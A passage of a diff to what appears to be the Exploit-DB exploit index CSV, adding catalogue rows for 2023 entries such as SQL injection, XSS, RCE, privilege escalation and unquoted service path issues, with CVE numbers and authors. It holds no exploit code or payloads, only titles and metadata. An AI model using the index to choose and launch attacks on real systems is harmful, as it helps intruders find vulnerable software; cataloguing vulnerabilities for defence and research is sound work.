v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,, 34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html 34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html @@ -19576,6 +19590,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42682,exploits/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42688,exploits/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42669,exploits/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, +51329,exploits/php/webapps/51329.py,"Icinga Web 2.10 - Arbitrary File Disclosure",2023-04-08,"Jacob Ebben",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-24716,,,,, 42679,exploits/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,webapps,php,,2011-03-30,2014-12-16,1,CVE-2011-1557;OSVDB-73408,,,,,https://www.securityfocus.com/bid/47100/info 42667,exploits/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, @@ -21771,6 +21786,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16906,exploits/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,webapps,php,,2010-06-15,2016-11-04,1,OSVDB-64578,"Metasploit Framework (MSF)",,,, 9926,exploits/php/webapps/9926.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Execution",2009-07-22,spinbad,webapps,php,,2009-07-21,,1,OSVDB-64578;CVE-2011-4908,,,,, 48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,,2020-05-26,2020-05-26,0,,,,,, +51334,exploits/php/webapps/51334.py,"Joomla! v4.2.8 - Unauthenticated information disclosure",2023-04-08,"Alexandre ZANNI",webapps,php,,2023-04-08,2023-04-08,0,CVE-2023-23752,,,,, 37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80,2015-08-08,2015-08-08,1,OSVDB-126309,,,,, 35667,exploits/php/webapps/35667.txt,"Joostina (Multiple Components) - SQL Injection",2011-04-27,KedAns-Dz,webapps,php,,2011-04-27,2015-01-01,1,,,,,,https://www.securityfocus.com/bid/47595/info 35187,exploits/php/webapps/35187.txt,"Joostina 1.3 - 'index.php' Cross-Site Scripting",2011-01-08,MustLive,webapps,php,,2011-01-08,2014-11-07,1,,,,,,https://www.securityfocus.com/bid/45732/info @@ -22974,6 +22990,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,,2020-12-01,2020-12-01,0,,,,,, 49236,exploits/php/webapps/49236.txt,"Medical Center Portal Management System 1.0 - Multiple Stored XSS",2020-12-11,"Saeed Bala Ahmed",webapps,php,,2020-12-11,2020-12-11,0,,,,,, 41091,exploits/php/webapps/41091.txt,"Medical Clinic Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,, +51338,exploits/php/webapps/51338.txt,"Medicine Tracker System v1.0 - Sql Injection",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,, 18202,exploits/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",webapps,php,,2011-12-05,2011-12-05,0,OSVDB-77491,,,,,http://secunia.com/advisories/47010/ 46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80,2019-03-22,2019-03-22,0,,"SQL Injection (SQLi)",,,, 32232,exploits/php/webapps/32232.txt,"Meet#Web 0.8 - 'ManagerResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php,,2008-08-13,2014-03-13,1,CVE-2008-6066;OSVDB-51773,,,,,https://www.securityfocus.com/bid/30673/info @@ -24502,6 +24519,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48444,exploits/php/webapps/48444.txt,"Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection",2020-05-11,"Tarun Sehgal",webapps,php,,2020-05-11,2020-05-11,0,,,,,, 39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip, 47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,, +51337,exploits/php/webapps/51337.txt,"Online Appointment System V1.0 - Cross-Site Scripting (XSS)",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,, 50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,, 47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,, 48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,, @@ -24670,6 +24688,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34951,exploits/php/webapps/34951.txt,"Online Work Order Suite - Login SQL Injection",2010-11-02,VSN,webapps,php,,2010-11-02,2014-10-13,1,CVE-2010-4186;OSVDB-68972,,,,,https://www.securityfocus.com/bid/44608/info 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,,2020-06-05,2020-06-05,0,,,,,, 48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php,,2020-05-28,2020-05-28,0,,,,,, +51344,exploits/php/webapps/51344.txt,"Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,webapps,php,,2023-04-08,2023-04-08,0,,,,,, 29264,exploits/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,webapps,php,,2013-10-29,2013-10-29,0,OSVDB-99014;OSVDB-99013,,,,,https://www.vulnerability-lab.com/get_content.php?id=1120 34469,exploits/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",webapps,php,,2010-08-10,2014-08-30,1,,,,,,https://www.securityfocus.com/bid/42446/info 25158,exploits/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,webapps,php,,2005-02-24,2013-05-02,1,,,,,,https://www.securityfocus.com/bid/12647/info @@ -25478,6 +25497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39709,exploits/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,webapps,php,443,2016-04-18,2016-04-18,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.6-RELEASE-i386.iso.gz,http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf 39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",webapps,php,443,2016-01-25,2016-04-14,0,OSVDB-132268,,,,http://www.exploit-db.compfsense-RELENG_2_2_5.tar.gz, 39695,exploits/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery",2016-04-14,"Aatif Shahdad",webapps,php,443,2016-04-14,2016-04-14,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz, +51352,exploits/php/webapps/51352.py,"pfsenseCE v2.6.0 - Anti-brute force protection bypass",2023-04-08,FabDotNET,webapps,php,,2023-04-08,2023-04-08,0,CVE-2023-27100,,,,, 43090,exploits/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15969,,,,, 22373,exploits/php/webapps/22373.txt,"PG Dating Pro CMS 1.0 - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,webapps,php,,2012-10-31,2012-10-31,0,OSVDB-86857;OSVDB-86856;OSVDB-86855,,,,,https://www.vulnerability-lab.com/get_content.php?id=736 17531,exploits/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,webapps,php,,2011-07-14,2011-07-14,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5027.php @@ -28501,6 +28521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43297,exploits/php/webapps/43297.txt,"Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2018-11-20,1,CVE-2017-17628,"SQL Injection (SQLi)",,,, 50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,,2021-06-22,2021-06-22,0,,,,,, 47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80,2019-08-02,2019-08-02,0,,"SQL Injection (SQLi)",,,, +51330,exploits/php/webapps/51330.txt,"Restaurant Management System 1.0 - SQL Injection",2023-04-08,calfcrusher,webapps,php,,2023-04-08,2023-04-08,0,,,,,, 47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0 - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,,2019-10-17,2019-10-17,0,,,,,, 48885,exploits/php/webapps/48885.txt,"Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)",2020-10-16,b1nary,webapps,php,,2020-10-16,2020-10-16,0,,,,,, 34760,exploits/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",webapps,php,80,2014-09-24,2014-09-24,0,CVE-2014-6619;OSVDB-112019,,,,http://www.exploit-db.comRSv1.0.0.zip, @@ -31981,6 +32002,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 11883,exploits/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,webapps,php,,2010-03-24,,1,,,,,, 35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz, 23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt +51349,exploits/php/webapps/51349.txt,"WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,, 34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info 44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,, 7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,, @@ -33673,6 +33695,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 7074,exploits/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,webapps,php,,2008-11-08,,1,OSVDB-49797;CVE-2008-6960,,,,, 8408,exploits/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,webapps,php,,2009-04-12,2017-01-02,1,,,,,, 28557,exploits/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",webapps,php,80,2013-09-25,2013-09-25,0,CVE-2013-5693;CVE-2013-5692;OSVDB-97366;OSVDB-97365,,,,,https://www.htbridge.com/advisory/HTB23172 +51346,exploits/php/webapps/51346.txt,"X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)",2023-04-08,"Betul Denizler",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-48177,,,,, +51345,exploits/php/webapps/51345.txt,"X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-04-08,"Betul Denizler",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-48178,,,,, 38323,exploits/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5074;OSVDB-128086,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5074/ 38321,exploits/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5075;OSVDB-128085,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5075/ 1738,exploits/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Remote Command Execution",2006-05-02,rgod,webapps,php,,2006-05-01,2016-12-23,1,OSVDB-25149;CVE-2006-2156,,,,http://www.exploit-db.comx7chat2_0_0.zip, @@ -37201,6 +37225,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,, 42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161 +51348,exploits/windows/dos/51348.txt,"Microsoft Windows 11 - 'cmd.exe' Denial of Service",2023-04-08,"Milad karimi",dos,windows,,2023-04-08,2023-04-08,0,,,,,, 20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info 20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info 20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info @@ -38925,6 +38950,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 14959,exploits/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",local,windows,,2010-09-09,2010-09-10,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14959.png,http://www.exploit-db.comAcoustica-MP3-Audio-Mixer-Installer.exe, 6329,exploits/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,local,windows,,2008-08-28,,1,CVE-2007-3006;OSVDB-43455,,,,, 47615,exploits/windows/local/47615.txt,"Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path",2019-11-12,"Alejandra Sánchez",local,windows,,2019-11-12,2019-11-12,0,,,,,, +51332,exploits/windows/local/51332.txt,"ActFax 10.10 - Unquoted Path Services",2023-04-08,"Birkan ALHAN",local,windows,,2023-04-08,2023-04-08,0,,,,,, 20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",local,windows,,2012-08-29,2012-08-29,1,OSVDB-85175,,,http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-29-at-50812-pm.png,http://www.exploit-db.comactfax_setup_en.exe, 50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",2021-09-13,"Salman Asad",local,windows,,2021-09-13,2022-08-01,1,,,,,, 21139,exploits/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,local,windows,,2012-09-08,2012-09-08,1,OSVDB-85175,"Metasploit Framework (MSF)",,,, @@ -39626,6 +39652,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,,2021-02-09,2021-02-17,0,,,,,, 25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,,2013-05-14,2013-05-14,1,CVE-2013-0726;OSVDB-92694,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51725/ 26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows,,2013-07-09,2013-07-09,1,CVE-2013-3482;OSVDB-93650,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/53620/ +51351,exploits/windows/local/51351.txt,"ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path",2023-04-08,"Milad karimi",local,windows,,2023-04-08,2023-04-08,0,,,,,, 7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,,2008-12-17,,1,CVE-2008-5724;OSVDB-50942,,2008-Epfw_Exp.zip,,, 17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,local,windows,,2011-09-21,2011-09-21,1,CVE-2011-3494;OSVDB-75456,"Metasploit Framework (MSF)",,,, 19138,exploits/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",local,windows,,2012-06-14,2012-06-14,0,OSVDB-82986;CVE-2012-1661,,,,, @@ -40987,6 +41014,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 14768,exploits/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67496;CVE-2010-5236,,,,, 14781,exploits/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67583;CVE-2010-5195,,,,, 14752,exploits/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,0,OSVDB-67567,,,,, +51336,exploits/windows/local/51336.txt,"RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution",2023-04-08,hyp3rlinx,local,windows,,2023-04-08,2023-04-08,0,CVE-2022-47529,,,,, 44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,,2018-06-13,2018-06-13,0,CVE-2018-10619,,,,, 47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,, 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,,2020-04-20,2020-04-20,0,,,,,, @@ -41103,6 +41131,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,,2019-08-13,2019-08-13,0,,,,,,https://github.com/AbsoZed/SteamPrivEsc/blob/d51c5bc73c3db87bcdb6bb8e3480483ebb28e8d4/SteamPwn.ps1 16633,exploits/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,OSVDB-64580,"Metasploit Framework (MSF)",,,, 30032,exploits/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Local Buffer Overflow (SEH) (DEP Bypass + ROP)",2013-12-04,metacom,local,windows,,2013-12-06,2016-09-04,1,CVE-2013-7186;OSVDB-101253,,,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-06-at-113504.png,, +51341,exploits/windows/local/51341.txt,"Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation",2023-04-08,"TOUHAMI Kasbaoui",local,windows,,2023-04-08,2023-04-08,0,,,,,, 45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)",2018-09-13,"Parvez Anwar",local,windows,,2018-09-13,2019-02-13,1,,Local,,,http://www.exploit-db.comSTOPzillaAntiMalware.msi, 45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2018-09-15,"Ivan Ivanovic",local,windows,,2019-03-04,2019-03-11,0,,,,,, 18186,exploits/windows/local/18186.rb,"StoryBoard Quick 6 - Local Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",local,windows,,2011-12-01,2011-12-01,0,OSVDB-77421;CVE-2011-5172,"Metasploit Framework (MSF)",,,,http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf